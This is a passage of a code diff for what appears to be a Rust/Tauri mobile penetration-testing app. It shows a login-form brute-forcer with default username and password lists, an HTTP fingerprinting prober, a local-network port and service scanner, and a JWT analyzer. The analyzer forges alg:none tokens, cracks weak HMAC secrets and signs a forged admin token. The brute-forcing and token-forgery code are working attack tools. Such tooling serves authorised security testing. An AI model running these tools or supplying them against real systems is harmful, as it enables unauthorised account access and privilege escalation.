+                let resp = match builder.send().await {
+                    Ok(r) => r,
+                    Err(_) => {
+                        let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                        let _ = app.emit("brute:progress", serde_json::json!({"done": n, "total": total}));
+                        return None;
+                    }
+                };
+
+                let status = resp.status().as_u16();
+                let redirect = resp.headers().get("location")
+                    .and_then(|v| v.to_str().ok()).map(String::from);
+                let body_text = resp.text().await.unwrap_or_default();
+                let size = body_text.len() as u64;
+                let time_ms = start.elapsed().as_millis();
+
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("brute:progress", serde_json::json!({"done": n, "total": total}));
+
+                // detect success
+                let mut reason = String::new();
+                let mut matched = false;
+                if let Some(re) = &succ_re {
+                    if re.is_match(&body_text) { matched = true; reason = "success_regex matched".into(); }
+                }
+                if !matched {
+                    if let Some(re) = &fail_re {
+                        if !re.is_match(&body_text) { matched = true; reason = "fail_regex did NOT match".into(); }
+                    }
+                }
+                if !matched && !succ_status.is_empty() && succ_status.contains(&status) {
+                    matched = true; reason = format!("success_status matched ({status})");
+                }
+                if !matched {
+                    if let (Some(delta), Some(bs)) = (size_delta, baseline_size) {
+                        if (size as i64 - bs).abs() > delta {
+                            matched = true;
+                            reason = format!("size delta {} > {} (baseline {bs} vs {size})",
+                                (size as i64 - bs).abs(), delta);
+                        }
+                    }
+                }
+
+                if matched {
+                    let hit = FormBruteHit { user, pass, status, size, redirect, reason, time_ms };
+                    let _ = app.emit("brute:hit", hit.clone());
+                    if stop_first { stop.store(true, std::sync::atomic::Ordering::Relaxed); }
+                    Some(hit)
+                } else {
+                    None
+                }
+            }
+        })
+        .buffer_unordered(req.concurrency.max(1))
+        .filter_map(|x| async move { x })
+        .collect()
+        .await;
+
+    let _ = app.emit("brute:done", hits.len());
+    Ok(hits)
+}
+
+fn parse_kv(s: &str) -> Vec<(String, String)> {
+    s.split('&').filter_map(|p| {
+        let (k, v) = p.split_once('=')?;
+        Some((k.to_string(), v.to_string()))
+    }).collect()
+}
+
+#[tauri::command]
+pub fn form_brute_common_users() -> Vec<&'static str> {
+    vec![
+        "admin", "administrator", "root", "user", "test", "guest",
+        "superadmin", "sysadmin", "operator", "supervisor", "manager",
+        "support", "webmaster", "backup", "dev", "developer",
+        "info", "info@", "contact", "sales", "moderator",
+        "admin1", "admin2", "administrator1",
+        "pentest", "oscp", "offsec",
+        // common emails
+        "admin@example.com", "test@test.com",
+    ]
+}
+
+#[tauri::command]
+pub fn form_brute_common_passwords() -> Vec<&'static str> {
+    vec![
+        "admin", "admin123", "administrator", "password", "password123", "pass123",
+        "12345", "123456", "1234567", "12345678", "123456789", "1234567890",
+        "qwerty", "qwerty123", "abc123", "111111", "000000", "letmein",
+        "welcome", "welcome1", "welcome123", "changeme", "changeme123",
+        "root", "toor", "pass", "test", "demo", "guest",
+        "default", "admin@123", "P@ssw0rd", "Password1", "P@ssword1",
+        "iloveyou", "monkey", "dragon", "master", "football", "baseball",
+        "Summer2023", "Summer2024", "Winter2024", "Autumn2024",
+        "company123", "corp123", "Company2024",
+        "admin2024", "password2024", "admin2023", "password2023",
+    ]
+}
diff --git a/src-tauri/src/modules/httpx.rs b/src-tauri/src/modules/httpx.rs
new file mode 100644
index 0000000..36da9b8
--- /dev/null
+++ b/src-tauri/src/modules/httpx.rs
@@ -0,0 +1,147 @@
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use once_cell::sync::Lazy;
+use regex::Regex;
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::sync::Semaphore;
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct HttpProbeRequest {
+    pub targets: Vec<String>,
+    pub ports: Option<Vec<u16>>,
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+    pub follow_redirects: bool,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct HttpProbeResult {
+    pub url: String,
+    pub status: u16,
+    pub title: Option<String>,
+    pub server: Option<String>,
+    pub content_length: Option<u64>,
+    pub tech: Vec<String>,
+}
+
+static TITLE_RE: Lazy<Regex> =
+    Lazy::new(|| Regex::new(r"(?is)<title[^>]*>(.*?)</title>").unwrap());
+
+fn detect_tech(headers: &reqwest::header::HeaderMap, body: &str) -> Vec<String> {
+    let mut tech = Vec::new();
+    let get = |k: &str| headers.get(k).and_then(|v| v.to_str().ok()).unwrap_or("");
+
+    let server = get("server").to_lowercase();
+    let powered = get("x-powered-by").to_lowercase();
+
+    if server.contains("nginx") { tech.push("nginx".into()); }
+    if server.contains("apache") { tech.push("apache".into()); }
+    if server.contains("cloudflare") { tech.push("cloudflare".into()); }
+    if server.contains("iis") { tech.push("iis".into()); }
+    if powered.contains("php") { tech.push("php".into()); }
+    if powered.contains("express") { tech.push("express".into()); }
+    if powered.contains("asp.net") { tech.push("asp.net".into()); }
+
+    let b = body.to_lowercase();
+    if b.contains("wp-content") || b.contains("wp-includes") { tech.push("wordpress".into()); }
+    if b.contains("drupal-settings-json") { tech.push("drupal".into()); }
+    if b.contains("joomla") { tech.push("joomla".into()); }
+    if b.contains("__next_data__") { tech.push("next.js".into()); }
+    if b.contains("data-reactroot") || b.contains("__reactcontainer") { tech.push("react".into()); }
+    if b.contains("ng-version") { tech.push("angular".into()); }
+    if b.contains("window.laravel") || b.contains("laravel_session") { tech.push("laravel".into()); }
+
+    tech
+}
+
+async fn probe_one(client: &reqwest::Client, url: String) -> Option<HttpProbeResult> {
+    let resp = client.get(&url).send().await.ok()?;
+    let status = resp.status().as_u16();
+    let headers = resp.headers().clone();
+    let content_length = resp.content_length();
+    let server = headers
+        .get("server")
+        .and_then(|v| v.to_str().ok())
+        .map(String::from);
+
+    let body = resp.text().await.unwrap_or_default();
+    let title = TITLE_RE
+        .captures(&body)
+        .and_then(|c| c.get(1))
+        .map(|m| m.as_str().trim().to_string())
+        .filter(|s| !s.is_empty());
+
+    let tech = detect_tech(&headers, &body);
+
+    Some(HttpProbeResult { url, status, title, server, content_length, tech })
+}
+
+#[tauri::command]
+pub async fn http_probe(
+    app: AppHandle,
+    req: HttpProbeRequest,
+) -> Result<Vec<HttpProbeResult>, String> {
+    let client = reqwest::Client::builder()
+        .danger_accept_invalid_certs(true)
+        .timeout(Duration::from_millis(req.timeout_ms))
+        .redirect(if req.follow_redirects {
+            reqwest::redirect::Policy::limited(5)
+        } else {
+            reqwest::redirect::Policy::none()
+        })
+        .user_agent("Mozilla/5.0 (PocketPentester)")
+        .build()
+        .map_err(|e| e.to_string())?;
+
+    let ports = req.ports.unwrap_or_else(|| vec![80, 443, 8080, 8443]);
+
+    let mut urls: Vec<String> = Vec::new();
+    for t in &req.targets {
+        let t = t.trim();
+        if t.starts_with("http://") || t.starts_with("https://") {
+            urls.push(t.to_string());
+            continue;
+        }
+        for p in &ports {
+            let scheme = if matches!(p, 443 | 8443) { "https" } else { "http" };
+            if *p == 80 || *p == 443 {
+                urls.push(format!("{scheme}://{t}"));
+            } else {
+                urls.push(format!("{scheme}://{t}:{p}"));
+            }
+        }
+    }
+
+    let total = urls.len();
+    let sem = Arc::new(Semaphore::new(req.concurrency.max(1)));
+    let done = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+    let client = Arc::new(client);
+
+    let results: Vec<HttpProbeResult> = stream::iter(urls.into_iter())
+        .map(|url| {
+            let sem = sem.clone();
+            let done = done.clone();
+            let client = client.clone();
+            let app = app.clone();
+            async move {
+                let _permit = sem.acquire().await.unwrap();
+                let res = probe_one(&client, url).await;
+                let n = done.fetch_add(1, std::sync::atomic::Ordering::Relaxed) + 1;
+                let _ = app.emit("httpx:progress", serde_json::json!({"done": n, "total": total}));
+                if let Some(ref r) = res {
+                    let _ = app.emit("httpx:hit", r.clone());
+                }
+                res
+            }
+        })
+        .buffer_unordered(req.concurrency.max(1))
+        .filter_map(|x| async move { x })
+        .collect()
+        .await;
+
+    let _ = app.emit("httpx:done", results.len());
+    Ok(results)
+}
diff --git a/src-tauri/src/modules/jwt.rs b/src-tauri/src/modules/jwt.rs
new file mode 100644
index 0000000..9c59ad4
--- /dev/null
+++ b/src-tauri/src/modules/jwt.rs
@@ -0,0 +1,257 @@
+use base64::engine::general_purpose::URL_SAFE_NO_PAD;
+use base64::Engine;
+use hmac::{Hmac, Mac};
+use serde::{Deserialize, Serialize};
+use sha2::{Sha256, Sha384, Sha512};
+use tauri::{AppHandle, Emitter};
+
+type HmacSha256 = Hmac<Sha256>;
+type HmacSha384 = Hmac<Sha384>;
+type HmacSha512 = Hmac<Sha512>;
+
+#[derive(Debug, Clone, Serialize)]
+pub struct JwtDecoded {
+    pub header: serde_json::Value,
+    pub payload: serde_json::Value,
+    pub signature_b64: String,
+    pub alg: String,
+    pub issues: Vec<JwtIssue>,
+    pub forgeries: Vec<JwtForgery>,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct JwtIssue {
+    pub severity: String,
+    pub title: String,
+    pub detail: String,
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct JwtForgery {
+    pub attack: String,
+    pub description: String,
+    pub token: String,
+}
+
+fn b64_decode(s: &str) -> Option<Vec<u8>> {
+    URL_SAFE_NO_PAD.decode(s).ok()
+}
+
+fn b64_encode(b: &[u8]) -> String {
+    URL_SAFE_NO_PAD.encode(b)
+}
+
+fn parse(token: &str) -> Result<(serde_json::Value, serde_json::Value, String, String, String), String> {
+    let parts: Vec<&str> = token.split('.').collect();
+    if parts.len() != 3 {
+        return Err("not a valid JWT (expected 3 parts)".into());
+    }
+    let h_bytes = b64_decode(parts[0]).ok_or("bad base64 header")?;
+    let p_bytes = b64_decode(parts[1]).ok_or("bad base64 payload")?;
+
+    let header: serde_json::Value =
+        serde_json::from_slice(&h_bytes).map_err(|e| format!("header json: {e}"))?;
+    let payload: serde_json::Value =
+        serde_json::from_slice(&p_bytes).map_err(|e| format!("payload json: {e}"))?;
+
+    Ok((
+        header,
+        payload,
+        parts[2].to_string(),
+        parts[0].to_string(),
+        parts[1].to_string(),
+    ))
+}
+
+fn sign_hmac(key: &[u8], signing_input: &str, alg: &str) -> Option<Vec<u8>> {
+    match alg {
+        "HS256" => {
+            let mut mac = HmacSha256::new_from_slice(key).ok()?;
+            mac.update(signing_input.as_bytes());
+            Some(mac.finalize().into_bytes().to_vec())
+        }
+        "HS384" => {
+            let mut mac = HmacSha384::new_from_slice(key).ok()?;
+            mac.update(signing_input.as_bytes());
+            Some(mac.finalize().into_bytes().to_vec())
+        }
+        "HS512" => {
+            let mut mac = HmacSha512::new_from_slice(key).ok()?;
+            mac.update(signing_input.as_bytes());
+            Some(mac.finalize().into_bytes().to_vec())
+        }
+        _ => None,
+    }
+}
+
+const COMMON_SECRETS: &[&str] = &[
+    "secret", "password", "123456", "admin", "jwt", "jwt_secret", "jwtsecret",
+    "key", "your-256-bit-secret", "my_secret", "default", "test", "changeme",
+    "supersecret", "supersecretkey", "secretkey", "private", "MIIEvQIBA",
+    "hmac_secret", "token_secret", "api_secret", "auth_secret",
+];
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct JwtRequest {
+    pub token: String,
+    pub wordlist: Option<Vec<String>>,
+}
+
+#[tauri::command]
+pub async fn jwt_analyze(app: AppHandle, req: JwtRequest) -> Result<JwtDecoded, String> {
+    let (header, payload, sig, h_b64, p_b64) = parse(req.token.trim())?;
+
+    let alg = header
+        .get("alg")
+        .and_then(|v| v.as_str())
+        .unwrap_or("?")
+        .to_string();
+
+    let mut issues: Vec<JwtIssue> = Vec::new();
+    let mut forgeries: Vec<JwtForgery> = Vec::new();
+
+    // ==== ISSUES ====
+    if alg.eq_ignore_ascii_case("none") {
+        issues.push(JwtIssue {
+            severity: "CRITICAL".into(),
+            title: "alg:none".into(),
+            detail: "server accepts unsigned tokens if this alg was negotiated".into(),
+        });
+    }
+
+    if alg.starts_with("HS") {
+        issues.push(JwtIssue {
+            severity: "INFO".into(),
+            title: "HMAC symmetric algorithm".into(),
+            detail: "if secret is weak or algorithm confusion (HS vs RS) possible, token is forgeable".into(),
+        });
+    }
+
+    if let Some(exp) = payload.get("exp").and_then(|v| v.as_i64()) {
+        let now = std::time::SystemTime::now()
+            .duration_since(std::time::UNIX_EPOCH)
+            .map(|d| d.as_secs() as i64)
+            .unwrap_or(0);
+        if exp < now {
+            issues.push(JwtIssue {
+                severity: "INFO".into(),
+                title: "expired".into(),
+                detail: format!("exp={exp}, now={now}"),
+            });
+        }
+    } else {
+        issues.push(JwtIssue {
+            severity: "MEDIUM".into(),
+            title: "no exp claim".into(),
+            detail: "token does not expire — persistence risk".into(),
+        });
+    }
+
+    if header.get("kid").is_some() {
+        issues.push(JwtIssue {
+            severity: "MEDIUM".into(),
+            title: "kid present".into(),
+            detail: "test for kid SQLi/path-traversal injection (e.g. `kid=../../../../dev/null`)".into(),
+        });
+    }
+
+    if let Some(jku) = header.get("jku").and_then(|v| v.as_str()) {
+        issues.push(JwtIssue {
+            severity: "HIGH".into(),
+            title: "jku header".into(),
+            detail: format!("token fetches signing key from URL: {jku} — test host-header/SSRF bypass"),
+        });
+    }
+
+    if let Some(x5u) = header.get("x5u").and_then(|v| v.as_str()) {
+        issues.push(JwtIssue {
+            severity: "HIGH".into(),
+            title: "x5u header".into(),
+            detail: format!("token references cert at URL: {x5u} — test spoofing"),
+        });
+    }
+
+    // ==== FORGERIES ====
+
+    // 1. alg:none forgery
+    let none_header = serde_json::json!({ "alg": "none", "typ": "JWT" });
+    let none_header_b64 = b64_encode(serde_json::to_string(&none_header).unwrap().as_bytes());
+    let none_token = format!("{}.{}.", none_header_b64, p_b64);
+    forgeries.push(JwtForgery {
+        attack: "alg:none".into(),
+        description: "empty signature with alg=none header".into(),
+        token: none_token,
+    });
+
+    // 2. alg:NONE variant (case tricks)
+    for variant in &["None", "NONE", "nOnE"] {
+        let h = serde_json::json!({ "alg": variant, "typ": "JWT" });
+        let h_b64 = b64_encode(serde_json::to_string(&h).unwrap().as_bytes());
+        forgeries.push(JwtForgery {
+            attack: format!("alg:{variant}"),
+            description: "case-variation bypass for alg=none filters".into(),
+            token: format!("{}.{}.", h_b64, p_b64),
+        });
+    }
+
+    // 3. HMAC weak-secret bruteforce
+    if alg.starts_with("HS") {
+        let signing_input = format!("{}.{}", h_b64, p_b64);
+        let expected_sig = b64_decode(&sig).unwrap_or_default();
+
+        let wordlist: Vec<String> = req
+            .wordlist
+            .unwrap_or_default()
+            .into_iter()
+            .chain(COMMON_SECRETS.iter().map(|s| s.to_string()))
+            .collect();
+
+        let total = wordlist.len();
+        let _ = app.emit("jwt:status", format!("bruteforcing HMAC secret ({total} candidates)..."));
+
+        for (i, secret) in wordlist.iter().enumerate() {
+            if let Some(computed) = sign_hmac(secret.as_bytes(), &signing_input, &alg) {
+                if computed == expected_sig {
+                    issues.push(JwtIssue {
+                        severity: "CRITICAL".into(),
+                        title: "weak HMAC secret".into(),
+                        detail: format!("signing key recovered: \"{secret}\""),
+                    });
+
+                    // craft forged admin token
+                    if let Some(mut forged_payload) = payload.as_object().cloned() {
+                        forged_payload.insert("admin".into(), serde_json::json!(true));
+                        forged_payload.insert("role".into(), serde_json::json!("admin"));
+                        let forged_p_b64 = b64_encode(
+                            serde_json::to_string(&forged_payload).unwrap().as_bytes(),
+                        );
+                        let forged_input = format!("{}.{}", h_b64, forged_p_b64);
+                        if let Some(new_sig) = sign_hmac(secret.as_bytes(), &forged_input, &alg) {
+                            forgeries.push(JwtForgery {
+                                attack: format!("HMAC-forge ({secret})"),
+                                description: "valid sig with admin=true / role=admin injected".into(),
+                                token: format!("{}.{}", forged_input, b64_encode(&new_sig)),
+                            });
+                        }
+                    }
+                    break;
+                }
+            }
+            if i % 50 == 0 {
+                let _ = app.emit("jwt:progress", serde_json::json!({"done": i, "total": total}));
+            }
+        }
+        let _ = app.emit("jwt:progress", serde_json::json!({"done": total, "total": total}));
+    }
+
+    let _ = app.emit("jwt:done", serde_json::json!({"issues": issues.len(), "forgeries": forgeries.len()}));
+
+    Ok(JwtDecoded {
+        header,
+        payload,
+        signature_b64: sig,
+        alg,
+        issues,
+        forgeries,
+    })
+}
diff --git a/src-tauri/src/modules/lan_map.rs b/src-tauri/src/modules/lan_map.rs
new file mode 100644
index 0000000..001762e
--- /dev/null
+++ b/src-tauri/src/modules/lan_map.rs
@@ -0,0 +1,480 @@
+// ===================================================================
+// LAN Map — discover devices on the connected local network.
+//
+// Pure Rust, works on Android without root. Combines:
+//   1. TCP sweep on common ports across the /24 subnet
+//   2. mDNS service discovery (UDP 5353 multicast)
+//   3. SSDP/UPnP M-SEARCH (UDP 1900 multicast)
+//
+// NOTE on Android: multicast (mDNS/SSDP) requires WifiManager
+// MulticastLock to be held by the host app. Without it, the OS
+// drops multicast traffic in power-save. TCP sweep always works.
+//
+// TODO(plugin): Tauri Android plugin to acquire MulticastLock so
+//               mDNS/SSDP returns reliable results on phone.
+// TODO(oui): bundle a curated OUI prefix DB for vendor lookup.
+// ===================================================================
+
+use std::collections::HashMap;
+use std::net::{IpAddr, Ipv4Addr, SocketAddr};
+use std::sync::Arc;
+use std::time::Duration;
+
+use futures::stream::{self, StreamExt};
+use serde::{Deserialize, Serialize};
+use tauri::{AppHandle, Emitter};
+use tokio::net::{TcpStream, UdpSocket};
+use tokio::sync::Mutex;
+use tokio::time::timeout;
+
+#[derive(Debug, Clone, Deserialize)]
+pub struct LanScanRequest {
+    pub subnet_cidr: Option<String>,    // e.g. "192.168.1.0/24" — autodetect if None
+    pub ports: Option<Vec<u16>>,        // ports to TCP-probe per host
+    pub probe_mdns: bool,
+    pub probe_ssdp: bool,
+    pub concurrency: usize,
+    pub timeout_ms: u64,
+}
+
+#[derive(Debug, Clone, Serialize, Default)]
+pub struct LanDevice {
+    pub ip: String,
+    pub hostname: Option<String>,
+    pub open_ports: Vec<u16>,
+    pub services: Vec<String>,    // mDNS PTR services
+    pub upnp: Vec<String>,        // SSDP server / device descriptions
+    pub guess: Option<String>,    // best-effort device type guess
+}
+
+#[derive(Debug, Clone, Serialize)]
+pub struct LanScanReport {
+    pub local_ip: String,
+    pub subnet: String,
+    pub devices: Vec<LanDevice>,
+}
+
+const DEFAULT_PORTS: &[u16] = &[
+    21, 22, 23, 53, 80, 81, 88, 111, 135, 139, 143, 443, 445, 515, 548,
+    554, 631, 873, 902, 993, 995, 1080, 1433, 1521, 1723, 1883, 2049, 2121,
+    2222, 2375, 2376, 3000, 3306, 3389, 3478, 4444, 4567, 5000, 5040, 5432,
+    5555, 5601, 5672, 5900, 5984, 6379, 6667, 7000, 7077, 7474, 7680, 8000,
+    8008, 8009, 8080, 8081, 8086, 8088, 8089, 8123, 8181, 8200, 8291, 8333,
+    8443, 8500, 8765, 8834, 8888, 9000, 9090, 9100, 9200, 9418, 9999, 10000,
+    11211, 15672, 27017, 32400, 49152,
+];
+
+const MDNS_SERVICES: &[&str] = &[
+    "_services._dns-sd._udp.local",
+    "_http._tcp.local",
+    "_https._tcp.local",
+    "_ssh._tcp.local",
+    "_sftp-ssh._tcp.local",
+    "_smb._tcp.local",
+    "_afpovertcp._tcp.local",
+    "_printer._tcp.local",
+    "_ipp._tcp.local",
+    "_ipps._tcp.local",
+    "_pdl-datastream._tcp.local",
+    "_airplay._tcp.local",
+    "_raop._tcp.local",
+    "_googlecast._tcp.local",
+    "_spotify-connect._tcp.local",
+    "_homekit._tcp.local",
+    "_hap._tcp.local",
+    "_workstation._tcp.local",
+    "_device-info._tcp.local",
+    "_amzn-wplay._tcp.local",
+];
+
+// ------------------------------------------------------------------
+// helpers
+// ------------------------------------------------------------------
+
+fn detect_local_ipv4() -> Option<Ipv4Addr> {
+    match local_ip_address::local_ip() {
+        Ok(IpAddr::V4(v4)) => Some(v4),
+        _ => None,
+    }
+}
+
+fn parse_or_autodetect_subnet(spec: Option<&str>) -> Option<(Ipv4Addr, Vec<Ipv4Addr>, String)> {
+    if let Some(cidr) = spec {
+        if let Some((net, _)) = cidr.split_once('/') {
+            if let Ok(base) = net.parse::<Ipv4Addr>() {
+                // simple /24 only for now
+                let octets = base.octets();
+                let hosts: Vec<Ipv4Addr> = (1..255).map(|h| Ipv4Addr::new(octets[0], octets[1], octets[2], h)).collect();
+                return Some((base, hosts, cidr.to_string()));
+            }
+        }
+    }
+    let me = detect_local_ipv4()?;
+    let oct = me.octets();
+    let base = Ipv4Addr::new(oct[0], oct[1], oct[2], 0);
+    let hosts: Vec<Ipv4Addr> = (1..255)
+        .map(|h| Ipv4Addr::new(oct[0], oct[1], oct[2], h))
+        .filter(|ip| *ip != me)
+        .collect();
+    Some((base, hosts, format!("{}.{}.{}.0/24", oct[0], oct[1], oct[2])))
+}
+
+fn guess_from_ports_and_services(ports: &[u16], services: &[String], upnp: &[String]) -> Option<String> {
+    let s_lower: Vec<String> = services.iter().chain(upnp.iter()).map(|s| s.to_lowercase()).collect();
+    let any = |needle: &str| s_lower.iter().any(|s| s.contains(needle));
+
+    if any("googlecast") { return Some("Google Cast / Chromecast".into()); }
+    if any("airplay") || any("raop") { return Some("Apple AirPlay device".into()); }
+    if any("homekit") || any("hap") { return Some("HomeKit accessory".into()); }
+    if any("spotify-connect") { return Some("Spotify Connect speaker".into()); }
+    if any("printer") || any("ipp") || any("pdl") { return Some("Network printer".into()); }
+    if any("workstation") { return Some("Workstation (NETBIOS/SMB)".into()); }
+
+    if ports.contains(&445) || ports.contains(&139) { return Some("Windows / Samba host".into()); }
+    if ports.contains(&3389) { return Some("Windows RDP host".into()); }
+    if ports.contains(&22) { return Some("SSH server".into()); }
+    if ports.contains(&80) && ports.contains(&443) && ports.contains(&8443) { return Some("Web server / appliance".into()); }
+    if ports.contains(&554) || ports.contains(&8000) || ports.contains(&8554) { return Some("IP camera (RTSP)?".into()); }
+    if ports.contains(&5900) { return Some("VNC server".into()); }
+    if ports.contains(&3306) || ports.contains(&5432) || ports.contains(&27017) { return Some("Database server".into()); }
+    if ports.contains(&53) && ports.contains(&80) { return Some("Router / gateway".into()); }
+    if ports.contains(&80) || ports.contains(&8080) { return Some("HTTP service".into()); }
+    None
+}
+
+// ------------------------------------------------------------------
+// TCP sweep
+// ------------------------------------------------------------------
+
+async fn tcp_probe(ip: Ipv4Addr, port: u16, timeout_ms: u64) -> bool {
+    let addr = SocketAddr::new(IpAddr::V4(ip), port);
+    matches!(
+        timeout(Duration::from_millis(timeout_ms), TcpStream::connect(addr)).await,
+        Ok(Ok(_))
+    )
+}
+
+async fn sweep_host(ip: Ipv4Addr, ports: &[u16], concurrency: usize, timeout_ms: u64) -> Vec<u16> {
+    let sem = Arc::new(tokio::sync::Semaphore::new(concurrency.max(1)));
+    let mut futs = Vec::new();
+    for p in ports {
+        let sem = sem.clone();
+        let p = *p;
+        futs.push(async move {
+            let _permit = sem.acquire().await.unwrap();
+            if tcp_probe(ip, p, timeout_ms).await { Some(p) } else { None }
+        });
+    }
+    let mut results: Vec<u16> = futures::future::join_all(futs).await
+        .into_iter().flatten().collect();
+    results.sort_unstable();
+    results
+}
+
+// ------------------------------------------------------------------
+// mDNS — fire one PTR query per service, listen for N seconds
+// ------------------------------------------------------------------
+
+fn build_mdns_query(name: &str) -> Vec<u8> {
+    // minimal DNS query: tx=0, flags=0, 1 question, type PTR, class IN
+    let mut buf: Vec<u8> = Vec::new();
+    buf.extend_from_slice(&[0, 0]);             // tx id
+    buf.extend_from_slice(&[0, 0]);             // flags = standard query
+    buf.extend_from_slice(&[0, 1]);             // questions = 1
+    buf.extend_from_slice(&[0, 0, 0, 0, 0, 0]); // ans/auth/add = 0
+    for label in name.trim_end_matches('.').split('.') {
+        let bytes = label.as_bytes();
+        buf.push(bytes.len() as u8);
+        buf.extend_from_slice(bytes);
+    }
+    buf.push(0);
+    buf.extend_from_slice(&[0, 12]); // QTYPE = PTR
+    buf.extend_from_slice(&[0, 1]);  // QCLASS = IN
+    buf
+}
+
+fn parse_mdns_ptr(packet: &[u8]) -> Vec<String> {
+    // best-effort: pull ANSWER PTR rdata as service-instance names
+    // skips header + question; handles compression pointers loosely
+    let mut out: Vec<String> = Vec::new();
+    if packet.len() < 12 { return out; }
+    let ancount = u16::from_be_bytes([packet[6], packet[7]]) as usize;
+    if ancount == 0 { return out; }
+
+    // skip header
+    let mut pos = 12usize;
+    // skip 1 question
+    let qdcount = u16::from_be_bytes([packet[4], packet[5]]) as usize;
+    for _ in 0..qdcount {
+        // skip name labels
+        while pos < packet.len() {
+            let len = packet[pos] as usize;
+            if len == 0 { pos += 1; break; }
+            if len & 0xC0 == 0xC0 { pos += 2; break; }
+            pos += 1 + len;
+        }
+        pos += 4; // QTYPE + QCLASS
+        if pos > packet.len() { return out; }
+    }
+
+    for _ in 0..ancount {
+        if pos >= packet.len() { break; }
+        // skip NAME (compressed or labels)
+        if packet[pos] & 0xC0 == 0xC0 { pos += 2; }
+        else {
+            while pos < packet.len() {
+                let len = packet[pos] as usize;
+                if len == 0 { pos += 1; break; }
+                if len & 0xC0 == 0xC0 { pos += 2; break; }
+                pos += 1 + len;
+            }
+        }
+        if pos + 10 > packet.len() { break; }
+        let rtype = u16::from_be_bytes([packet[pos], packet[pos + 1]]);
+        let rdlen = u16::from_be_bytes([packet[pos + 8], packet[pos + 9]]) as usize;
+        pos += 10;
+        if pos + rdlen > packet.len() { break; }
+
+        if rtype == 12 {
+            // PTR rdata: domain-name
+            if let Some(name) = read_name(packet, pos) {
+                out.push(name);
+            }
+        }
+        pos += rdlen;
+    }
+    out
+}
+
+fn read_name(packet: &[u8], start: usize) -> Option<String> {
+    let mut pos = start;
+    let mut out = String::new();
+    let mut jumped = false;
+    let mut hops = 0;
+    loop {
+        if hops > 20 || pos >= packet.len() { return None; }
+        let len = packet[pos] as usize;
+        if len == 0 { break; }
+        if len & 0xC0 == 0xC0 {
+            if pos + 1 >= packet.len() { return None; }
+            let off = ((len & 0x3F) << 8) | packet[pos + 1] as usize;
+            pos = off;
+            jumped = true;
+            hops += 1;
+            continue;
+        }
+        if !out.is_empty() { out.push('.'); }
+        if pos + 1 + len > packet.len() { return None; }
+        out.push_str(std::str::from_utf8(&packet[pos + 1..pos + 1 + len]).unwrap_or(""));
+        pos += 1 + len;
+        if !jumped && len == 0 { break; }
+    }
+    if out.is_empty() { None } else { Some(out) }
+}
+
+async fn run_mdns(timeout_secs: u64) -> HashMap<String, Vec<String>> {
+    let mut results: HashMap<String, Vec<String>> = HashMap::new();
+
+    let sock = match UdpSocket::bind("0.0.0.0:0").await {
+        Ok(s) => s,
+        Err(_) => return results,
+    };
+    let _ = sock.set_broadcast(true);
+    let mdns_addr: SocketAddr = "224.0.0.251:5353".parse().unwrap();
+
+    for svc in MDNS_SERVICES {
+        let q = build_mdns_query(svc);
+        let _ = sock.send_to(&q, mdns_addr).await;
+    }
+
+    let deadline = tokio::time::Instant::now() + Duration::from_secs(timeout_secs);
+    let mut buf = [0u8; 4096];
+    loop {
+        let now = tokio::time::Instant::now();
+        if now >= deadline { break; }
+        let remaining = deadline - now;
+        match timeout(remaining, sock.recv_from(&mut buf)).await {
+            Ok(Ok((n, src))) => {
+                let entries = parse_mdns_ptr(&buf[..n]);
+                if let IpAddr::V4(v4) = src.ip() {
+                    let key = v4.to_string();
+                    let bucket = results.entry(key).or_default();
+                    for e in entries {
+                        if !bucket.contains(&e) { bucket.push(e); }
+                    }
+                }
+            }
+            _ => break,
+        }
+    }
+    results
+}
+
+// ------------------------------------------------------------------
+// SSDP
+// ------------------------------------------------------------------
+
+async fn run_ssdp(timeout_secs: u64) -> HashMap<String, Vec<String>> {
+    let mut results: HashMap<String, Vec<String>> = HashMap::new();
+
+    let sock = match UdpSocket::bind("0.0.0.0:0").await {
+        Ok(s) => s,
+        Err(_) => return results,
+    };
+    let _ = sock.set_broadcast(true);
+    let ssdp_addr: SocketAddr = "239.255.255.250:1900".parse().unwrap();
+
+    let msg = b"M-SEARCH * HTTP/1.1\r\n\
+        HOST: 239.255.255.250:1900\r\n\
+        MAN: \"ssdp:discover\"\r\n\
+        MX: 2\r\n\
+        ST: ssdp:all\r\n\r\n";
+    let _ = sock.send_to(msg, ssdp_addr).await;
+
+    let deadline = tokio::time::Instant::now() + Duration::from_secs(timeout_secs);
+    let mut buf = [0u8; 4096];
+    loop {
+        let now = tokio::time::Instant::now();
+        if now >= deadline { break; }
+        let remaining = deadline - now;
+        match timeout(remaining, sock.recv_from(&mut buf)).await {
+            Ok(Ok((n, src))) => {
+                if let IpAddr::V4(v4) = src.ip() {
+                    let text = String::from_utf8_lossy(&buf[..n]);
+                    let mut info = String::new();
+                    for line in text.lines() {
+                        let l = line.to_lowercase();
+                        if l.starts_with("server:") || l.starts_with("st:") || l.starts_with("location:") || l.starts_with("usn:") {
+                            if !info.is_empty() { info.push_str(" | "); }
+                            info.push_str(line.trim());
+                        }
+                    }
+                    if !info.is_empty() {
+                        let bucket = results.entry(v4.to_string()).or_default();
+                        if !bucket.contains(&info) { bucket.push(info); }
+                    }
+                }
+            }
+            _ => break,
+        }
+    }
+    results
+}
+
+// ------------------------------------------------------------------
+// orchestrator
+// ------------------------------------------------------------------
+
+#[tauri::command]
+pub async fn lan_scan(app: AppHandle, req: LanScanRequest) -> Result<LanScanReport, String> {
+    let ports = req.ports.clone().unwrap_or_else(|| DEFAULT_PORTS.to_vec());
+    let local_ip = detect_local_ipv4()
+        .map(|ip| ip.to_string())
+        .unwrap_or_else(|| "unknown".into());
+
+    let (_base, hosts, subnet) = parse_or_autodetect_subnet(req.subnet_cidr.as_deref())
+        .ok_or_else(|| "could not detect local network — pass subnet_cidr (e.g. 192.168.1.0/24)".to_string())?;
+
